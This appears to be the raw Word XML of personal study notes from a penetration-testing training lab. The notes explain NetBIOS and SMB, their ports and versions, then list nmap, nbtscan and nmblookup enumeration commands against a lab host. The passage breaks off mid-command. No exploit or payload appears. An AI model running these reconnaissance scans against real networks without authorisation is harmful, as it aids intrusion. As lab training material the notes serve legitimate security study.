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E85BF" w14:textId="150D29FD" w:rsidR="00853ABF" w:rsidRPr="005C3320" w:rsidRDefault="0060594E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C3320">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SMB &amp; NetBIOS enumeration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC669BB" w14:textId="42727F3F" w:rsidR="0060594E" w:rsidRDefault="005C3320">
      <w:r>
        <w:t>related in the network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B66D4F1" w14:textId="15896BA1" w:rsidR="005C3320" w:rsidRDefault="005C3320">
      <w:r>
        <w:t>File sharing on windows network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202D4663" w14:textId="77777777" w:rsidR="005C3320" w:rsidRDefault="005C3320"/>
    <w:p w14:paraId="7937C779" w14:textId="624D4D95" w:rsidR="005C3320" w:rsidRPr="004E7175" w:rsidRDefault="005C3320">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E7175">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NetBIOS (network basic input/output system):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668D4318" w14:textId="305164EE" w:rsidR="005C3320" w:rsidRDefault="005C3320">
      <w:r>
        <w:t>API /set of network protocol.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2380A6" w14:textId="691774FD" w:rsidR="005C3320" w:rsidRDefault="005C3320">
      <w:r w:rsidRPr="005C3320">
        <w:t xml:space="preserve">is an </w:t>
      </w:r>
      <w:r w:rsidRPr="005C3320">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>API (Application Programming Interface)</w:t>
      </w:r>
      <w:r w:rsidRPr="005C3320">
        <w:t xml:space="preserve"> that allows applications on different computers within a </w:t>
      </w:r>
      <w:r w:rsidRPr="005C3320">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>local area network (LAN)</w:t>
      </w:r>
      <w:r w:rsidRPr="005C3320">
        <w:t xml:space="preserve"> to communicate with each other.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A02588" w14:textId="1464886A" w:rsidR="005C3320" w:rsidRDefault="005C3320">
      <w:r>
        <w:t>Services:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10680FF9" w14:textId="17E03782" w:rsidR="005C3320" w:rsidRPr="005C3320" w:rsidRDefault="005C3320" w:rsidP="005C3320">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005C3320">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>UDP 137</w:t>
      </w:r>
      <w:r w:rsidRPr="005C3320">
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:t>NetBIOS-NS -&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="005C3320">
        <w:t xml:space="preserve"> Name service (resolving names to IPs)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03398972" w14:textId="7A60DE1F" w:rsidR="005C3320" w:rsidRPr="005C3320" w:rsidRDefault="005C3320" w:rsidP="005C3320">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005C3320">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>UDP 138</w:t>
      </w:r>
      <w:r w:rsidRPr="005C3320">
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:t>NetBIOS-DGM -&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="005C3320">
        <w:t xml:space="preserve"> Datagram service (connectionless communication</w:t>
      </w:r>
      <w:r>
        <w:t>/broadcasting</w:t>
      </w:r>
      <w:r w:rsidRPr="005C3320">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="515A808D" w14:textId="13B099BD" w:rsidR="005C3320" w:rsidRPr="005C3320" w:rsidRDefault="005C3320" w:rsidP="005C3320">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005C3320">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TCP 139</w:t>
      </w:r>
      <w:r w:rsidRPr="005C3320">
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:t>NetBIOS-SSN -&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="005C3320">
        <w:t xml:space="preserve"> Session service (connection-oriented communication)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8B7420" w14:textId="58D48274" w:rsidR="005C3320" w:rsidRDefault="00E67AF1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B9D900D" wp14:editId="721067CE">
            <wp:extent cx="2267067" cy="488975"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="71063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36607" name="Picture 7106366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B547" w14:textId="4E1CDBC8" w:rsidR="0060594E" w:rsidRPr="009D4477" w:rsidRDefault="00496241">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D4477">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SMB (server message block):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1A1BEE" w14:textId="3E3C116D" w:rsidR="00496241" w:rsidRDefault="00496241">
      <w:r w:rsidRPr="00496241">
        <w:t>SMB (</w:t>
      </w:r>
      <w:r w:rsidRPr="00496241">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Server Message Block</w:t>
      </w:r>
      <w:r w:rsidRPr="00496241">
        <w:t xml:space="preserve">) is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00496241">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>network file sharing protocol</w:t>
      </w:r>
      <w:r w:rsidRPr="00496241">
        <w:t xml:space="preserve"> that allows computers to read, write, and share files, printers, and other resources over a network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26396A10" w14:textId="77777777" w:rsidR="00944482" w:rsidRPr="00944482" w:rsidRDefault="00944482" w:rsidP="00944482">
      <w:r w:rsidRPr="00944482">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Key points:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A6B5AB" w14:textId="77777777" w:rsidR="00944482" w:rsidRPr="00944482" w:rsidRDefault="00944482" w:rsidP="00944482">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00944482">
        <w:t xml:space="preserve">Works mainly </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00944482">
        <w:t>at</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00944482">
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:r w:rsidRPr="00944482">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>application layer</w:t>
      </w:r>
      <w:r w:rsidRPr="00944482">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D940A09" w14:textId="77777777" w:rsidR="00944482" w:rsidRPr="00944482" w:rsidRDefault="00944482" w:rsidP="00944482">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00944482">
        <w:t xml:space="preserve">Used heavily in </w:t>
      </w:r>
      <w:r w:rsidRPr="00944482">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Windows networking</w:t>
      </w:r>
      <w:r w:rsidRPr="00944482">
        <w:t xml:space="preserve"> for file and printer sharing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2351B57E" w14:textId="77777777" w:rsidR="00944482" w:rsidRPr="00944482" w:rsidRDefault="00944482" w:rsidP="00944482">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00944482">
        <w:t xml:space="preserve">Provides </w:t>
      </w:r>
      <w:r w:rsidRPr="00944482">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>authenticated inter-process communication (IPC)</w:t>
      </w:r>
      <w:r w:rsidRPr="00944482">
        <w:t xml:space="preserve"> between systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10AC5B6C" w14:textId="77777777" w:rsidR="00944482" w:rsidRPr="00944482" w:rsidRDefault="00944482" w:rsidP="00944482">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00944482">
        <w:t>Allows</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00944482">
        <w:t xml:space="preserve"> actions like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3BFE00" w14:textId="77777777" w:rsidR="00944482" w:rsidRPr="00944482" w:rsidRDefault="00944482" w:rsidP="00944482">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00944482">
        <w:t>Access shared files/folders</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8C0F94" w14:textId="77777777" w:rsidR="00944482" w:rsidRPr="00944482" w:rsidRDefault="00944482" w:rsidP="00944482">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00944482">
        <w:t>Connect to shared printers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473E88D7" w14:textId="77777777" w:rsidR="00944482" w:rsidRPr="00944482" w:rsidRDefault="00944482" w:rsidP="00944482">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00944482">
        <w:t>Send data between applications on different computers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4514857C" w14:textId="77777777" w:rsidR="00944482" w:rsidRPr="00944482" w:rsidRDefault="00944482" w:rsidP="00944482">
      <w:r w:rsidRPr="00944482">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>🔹</w:t>
      </w:r>
      <w:r w:rsidRPr="00944482">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00944482">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ports used:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F51B6AC" w14:textId="77777777" w:rsidR="00944482" w:rsidRPr="00944482" w:rsidRDefault="00944482" w:rsidP="00944482">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00944482">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>TCP 445</w:t>
      </w:r>
      <w:r w:rsidRPr="00944482">
        <w:t xml:space="preserve"> → Direct SMB over TCP (modern Windows systems)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD9A90B" w14:textId="77777777" w:rsidR="00944482" w:rsidRPr="00944482" w:rsidRDefault="00944482" w:rsidP="00944482">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00944482">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TCP 139</w:t>
      </w:r>
      <w:r w:rsidRPr="00944482">
        <w:t xml:space="preserve"> → Older SMB over NetBIOS (legacy support)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45CF2C76" w14:textId="77777777" w:rsidR="00944482" w:rsidRDefault="00944482"/>
    <w:p w14:paraId="2BB26928" w14:textId="14DEEB9B" w:rsidR="009D4477" w:rsidRPr="009D4477" w:rsidRDefault="009D4477">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D4477">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SMB versions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3077BE98" w14:textId="733D4913" w:rsidR="009D4477" w:rsidRPr="009D4477" w:rsidRDefault="009D4477" w:rsidP="009D4477">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="009D4477">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SMB 1.0</w:t>
      </w:r>
      <w:r w:rsidRPr="009D4477">
        <w:t xml:space="preserve"> → Old, insecure (disabled today).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD7A242" w14:textId="415948D5" w:rsidR="009D4477" w:rsidRPr="009D4477" w:rsidRDefault="009D4477" w:rsidP="009D4477">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="009D4477">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SMB 2.x</w:t>
      </w:r>
      <w:r w:rsidRPr="009D4477">
        <w:t xml:space="preserve"> → Performance improvements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7778C465" w14:textId="2E9B9E5D" w:rsidR="009D4477" w:rsidRPr="009D4477" w:rsidRDefault="009D4477" w:rsidP="009D4477">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="009D4477">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SMB 3.x</w:t>
      </w:r>
      <w:r w:rsidRPr="009D4477">
        <w:t xml:space="preserve"> → Strong security (encryption, integrity) + better performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F58F59D" w14:textId="77777777" w:rsidR="00473846" w:rsidRDefault="00473846"/>
    <w:p w14:paraId="35443EAF" w14:textId="5A00A32A" w:rsidR="00473846" w:rsidRPr="00473846" w:rsidRDefault="00473846">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00473846">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>LAB DEMO:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4DCF3C" w14:textId="303A79EC" w:rsidR="00473846" w:rsidRDefault="00E67AF1">
      <w:r>
        <w:t xml:space="preserve">Ping </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>demo.ine.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7259E8BB" w14:textId="5B4AB119" w:rsidR="00E67AF1" w:rsidRDefault="00E67AF1">
      <w:r>
        <w:t>#it is reachable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="629D59D5" w14:textId="22D5F9FA" w:rsidR="00E67AF1" w:rsidRDefault="00E67AF1" w:rsidP="00E67AF1">
      <w:r>
        <w:t>Ping demo1.ine.local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="498C34E4" w14:textId="6728BB43" w:rsidR="00E67AF1" w:rsidRDefault="00E67AF1" w:rsidP="00E67AF1">
      <w:r>
        <w:t>#it is not reachable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47EE4259" w14:textId="77777777" w:rsidR="00E67AF1" w:rsidRDefault="00E67AF1"/>
    <w:p w14:paraId="74175A64" w14:textId="24BAECF7" w:rsidR="00E67AF1" w:rsidRDefault="00E67AF1">
      <w:r>
        <w:t xml:space="preserve">Nmap </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>demo.ine.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="16F2EAE5" w14:textId="77777777" w:rsidR="002B6425" w:rsidRDefault="002B6425">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A027645" w14:textId="2C46107A" w:rsidR="00E67AF1" w:rsidRPr="00E20F83" w:rsidRDefault="00E20F83">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E20F83">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Enumerate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E20F83">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> of NetBIOS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DFC164B" w14:textId="3BC00818" w:rsidR="00E67AF1" w:rsidRDefault="00E67AF1">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Nbtscan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2F56BDA3" w14:textId="2A66EAF7" w:rsidR="00E67AF1" w:rsidRDefault="00E67AF1">
      <w:r>
        <w:t xml:space="preserve">#scan network for </w:t>
      </w:r>
      <w:r w:rsidRPr="00E20F83">
        <w:t>NetBIOS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> name info.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517849D7" w14:textId="77777777" w:rsidR="00E67AF1" w:rsidRPr="00E67AF1" w:rsidRDefault="00E67AF1" w:rsidP="00E67AF1">
      <w:r w:rsidRPr="00E67AF1">
        <w:t>Collects info like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB59F0A" w14:textId="77777777" w:rsidR="00E67AF1" w:rsidRPr="00E67AF1" w:rsidRDefault="00E67AF1" w:rsidP="00E67AF1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E67AF1">
        <w:t>NetBIOS name (computer name)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A3059E" w14:textId="77777777" w:rsidR="00E67AF1" w:rsidRPr="00E67AF1" w:rsidRDefault="00E67AF1" w:rsidP="00E67AF1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E67AF1">
        <w:t>Workgroup/domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511B6713" w14:textId="77777777" w:rsidR="00E67AF1" w:rsidRPr="00E67AF1" w:rsidRDefault="00E67AF1" w:rsidP="00E67AF1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E67AF1">
        <w:t>Logged-in user (sometimes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="234E143A" w14:textId="77777777" w:rsidR="00E67AF1" w:rsidRPr="00E67AF1" w:rsidRDefault="00E67AF1" w:rsidP="00E67AF1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E67AF1">
        <w:t>MAC address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9DE139" w14:textId="77777777" w:rsidR="00E67AF1" w:rsidRDefault="00E67AF1"/>
    <w:p w14:paraId="7787B20B" w14:textId="08F80EA6" w:rsidR="00E67AF1" w:rsidRDefault="00E67AF1">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Whatis</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nbtscan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6A902DED" w14:textId="2682D372" w:rsidR="00E67AF1" w:rsidRDefault="00E67AF1" w:rsidP="005E3287">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Nbtscan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>/subnet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222EF87B" w14:textId="77777777" w:rsidR="00E67AF1" w:rsidRDefault="00E67AF1" w:rsidP="005E3287"/>
    <w:p w14:paraId="0E415150" w14:textId="570A11C7" w:rsidR="00E67AF1" w:rsidRDefault="001A6DB9" w:rsidP="005E3287">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Nmblookup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="64B71DCC" w14:textId="401E8057" w:rsidR="001A6DB9" w:rsidRDefault="001A6DB9" w:rsidP="005E3287">
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:r w:rsidRPr="001A6DB9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001A6DB9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NetBIOS name resolver</w:t>
      </w:r>
      <w:r w:rsidRPr="001A6DB9">
        <w:t xml:space="preserve"> (part of Samba), used to query or resolve NetBIOS names to IPs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6D60FF" w14:textId="1E29C944" w:rsidR="00E67AF1" w:rsidRDefault="001A6DB9" w:rsidP="005E3287">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Nmblookup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -A </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5A531A25" w14:textId="77777777" w:rsidR="001A6DB9" w:rsidRDefault="001A6DB9" w:rsidP="005E3287"/>
    <w:p w14:paraId="59663D9C" w14:textId="219A6D1E" w:rsidR="001A6DB9" w:rsidRDefault="001A6DB9" w:rsidP="005E3287">
      <w:r>
        <w:t>Nmap -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sU</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -p 137 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="476DF494" w14:textId="77777777" w:rsidR="001A6DB9" w:rsidRDefault="001A6DB9" w:rsidP="005E3287"/>
    <w:p w14:paraId="357EF38C" w14:textId="1F642319" w:rsidR="001A6DB9" w:rsidRDefault="001A6DB9" w:rsidP="005E3287">
      <w:r>
        <w:t>Nmap -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sU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-T4 –script </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nbstat.nse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -p137 -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Pn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -n </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5BAAEAE6" w14:textId="77777777" w:rsidR="001A6DB9" w:rsidRDefault="001A6DB9" w:rsidP="005E3287"/>
    <w:p w14:paraId="6B06C6BC" w14:textId="1A262CBF" w:rsidR="00E20F83" w:rsidRDefault="00E20F83" w:rsidP="005E3287">
      <w:r>
        <w:t>No useful information found.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE185EF" w14:textId="77777777" w:rsidR="00E20F83" w:rsidRDefault="00E20F83" w:rsidP="005E3287"/>
    <w:p w14:paraId="4006B2B3" w14:textId="06CA95B6" w:rsidR="001A6DB9" w:rsidRPr="00E20F83" w:rsidRDefault="00E20F83" w:rsidP="005E3287">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E20F83">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Enumerate version of SMB:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A248E91" w14:textId="77777777" w:rsidR="00E20F83" w:rsidRDefault="00E20F83" w:rsidP="005E3287"/>
    <w:p w14:paraId="10446500" w14:textId="77777777" w:rsidR="00E20F83" w:rsidRDefault="00E20F83" w:rsidP="00E20F83">
      <w:r>
        <w:t xml:space="preserve">Nmap -SV -p 139,445 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3D5CFD23" w14:textId="77777777" w:rsidR="001A6DB9" w:rsidRDefault="001A6DB9" w:rsidP="005E3287"/>
    <w:p w14:paraId="28C543F2" w14:textId="4AC8F4C4" w:rsidR="00E20F83" w:rsidRDefault="00E20F83" w:rsidP="005E3287">
      <w:r>
        <w:t xml:space="preserve">Nmap -p445 </w:t>
      </w:r>
      <w:r w:rsidR="002B6425">
        <w:t>- -</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">script </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">-protocols </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="196A0A4F" w14:textId="63BA2859" w:rsidR="005E3287" w:rsidRDefault="00E20F83" w:rsidP="005E3287">
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:r w:rsidRPr="00E20F83">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">-protocols: what version of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> on the target </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3A1F37" w14:textId="77777777" w:rsidR="005E3287" w:rsidRDefault="005E3287" w:rsidP="005E3287"/>
    <w:p w14:paraId="6F75F2F8" w14:textId="35D47AE5" w:rsidR="00E20F83" w:rsidRDefault="009139EB" w:rsidP="005E3287">
      <w:r>
        <w:t xml:space="preserve">#indentify the security level of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="36B459AA" w14:textId="4C1C5547" w:rsidR="009139EB" w:rsidRDefault="009139EB" w:rsidP="009139EB">
      <w:r>
        <w:t xml:space="preserve">Nmap -p445 –script </w:t>
      </w:r>
